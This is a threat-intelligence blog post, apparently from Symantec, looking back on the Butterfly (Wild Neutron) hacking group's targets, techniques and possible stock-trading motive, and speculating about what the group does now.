The Butterfly Gang — Where Are They Now?

Still making money, I suspect!

One of the most interesting groups I have investigated in the course of my career in cyber security is the Butterfly gang, aka Wild Neutron. This group is regularly discussed by security researchers — “You see anything from these guys lately?” is the usual question I and others ask, typically after a few drinks. They are a veritable Yeti (not the crouching type), or Loch Ness monster: often discussed, never seen. So, why do they evoke such interest? They were one of the best groups of hackers we’ve encountered, that (probably) didn’t work for a government. Active from around 2011, they used zero-day exploits, custom malware, SQL injections attacks, encrypted command and control (C&C ) servers, and watering hole attacks, among many other tricks, to compromise multiple organizations until mid-2015, when they disappeared.

Who was the Butterfly gang?

My favorite theory is that they were using information stolen from organizations to make money from the stock market. There were at least three instances we identified where a company was discussed in the media with respect to some upcoming organizational change that would affect the company and its stock price in some way. A few days after the media publication, the Butterfly gang would hack into the company, steal the information they were looking for and then leave, cleaning up traces of their activity as they went. There’s no way to know if they then profited from this data: that’s the beauty of their approach.

They went after major tech companies including Twitter, Facebook, Apple, and Microsoft, as well as targeting law firms, big pharma, and mining companies. In 2017, Reuters published an article claiming that during the Microsoft compromise of 2013, the Butterfly gang obtained access to Microsoft’s bug database, clearly looking for vulnerabilities that could be used to facilitate its attacks. It’s possible that the attacks against the other tech companies were for a similar purpose, to obtain information or tools that would help them in future work.

Technically, the Butterfly gang was very good. Not excellent, but very good. They used at least two zero-day exploits in their attacks, one against a Java vulnerability and the other against an Internet Explorer 10 (IE10) vulnerability. The IE10 vulnerability was never formally identified. It is possible that this vulnerability was stolen in the 2013 attack. Likely there were other exploits used that were never discovered. When cleaning up victim machines, the gang would use secure deletion tools (shred) to ensure that malware they installed on victim computers was thoroughly deleted. Their C&C servers appeared to be virtual machines running inside encrypted volumes, making forensic analysis very difficult. When access was gained on a network, the Butterfly gang would typically spread to email servers, or document repositories, and then steal the information they wanted access to. Access to a victim network would sometimes be maintained for a period of time, but a lot of their activity seemed to involve smash and grab attacks, where they would move in and out relatively quickly.

There were a few disconcerting oddities in some of their victims. In a major technology company, the target computer compromised was used to monitor internal physical security systems. The Butterfly gang had access to CCTV and electronically controlled doors, potentially giving them the ability to physically compromise a site. Scary stuff. A less Mission Impossible theory is that they could use the CCTV access in an attempt to see what passwords users were typing.

Separately, Kaspersky identified a “jihadist forum” being targeted by the Butterfly gang. This is completely at odds with the rest of the gang’s targeting. To account for this targeting, it’s possible that the Butterfly gang were hackers for hire, paid to attack specific targets; the jihadi forum attack performed on behalf of one client, and the various other finance related attacks performed on the behalf of another.

“It’s possible that the Butterfly gang were hackers for hire, paid to attack specific targets”

The group did make mistakes though. The fact that I am even writing this, that the security industry was able to tie together a number of its attacks, demonstrates that. It reused the Jripbot malware against multiple victims, and underestimated the ability of antivirus software to track the tool, thus linking activity. Its 2012 attack, which resulted in the compromise of a number of big fish, was noisy and garnered a lot of attention. The group does appear, however, to have learned from its mistakes, doubtless helped in no small part by industry (including Symantec) reporting on its activity. After our publication, and a similar publication from Kaspersky, no more victims were discovered. No sign of the Jripbot malware was seen, or any of its other custom developed tools. Has the Butterfly gang just disappeared? Shut up shop?

Where is the Butterfly gang now?

If my favorite theory is true, and these attackers were making money on the stock market, I think it’s very unlikely that they would just stop. It seems to me to be a potentially very effective way to make money, with minimal risk for the attackers. If they are judicious in the use of trading on stolen information, are not greedy making large amounts of money in single transactions, I’d imagine that it’s very difficult to detect such activity (This might show just how much I know about the stock market, which is pretty much nothing). However, I suspect that the Butterfly attackers completely abandoned everything they used in the past, and instead have likely moved to using open source tools: common hacking tools that are openly available and difficult to associate with any given actor. It’s the technique de jour, used by many different hacking groups over the past few years.

Quite possibly we have run into the Butterfly attackers again during an investigation where something like PowerShell was used to deliver a Metasploit remote access module, but we simply didn’t know it was them. They have effectively shed their past, like a caterpillar turning into a butterfly. (I really wish we’d named the group caterpillar now, and that simile would work a lot better).

However, waffle aside, an interesting group to have worked on, and also interesting to speculate as to how many similar groups are active, operating extremely discreetly, making money from hacking, and no one knows about them.

Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.

Like this story? Recommend it by hitting the heart button so others on Medium see it, and follow Threat Intel on Medium for more great content.